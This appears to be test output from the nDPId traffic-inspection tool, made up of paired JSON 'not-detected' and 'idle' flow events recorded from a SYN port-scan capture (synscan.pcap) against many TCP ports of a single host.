-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":306,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":31038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2382,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2382,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":340,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":340,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2393,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2394,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2393,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2394,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 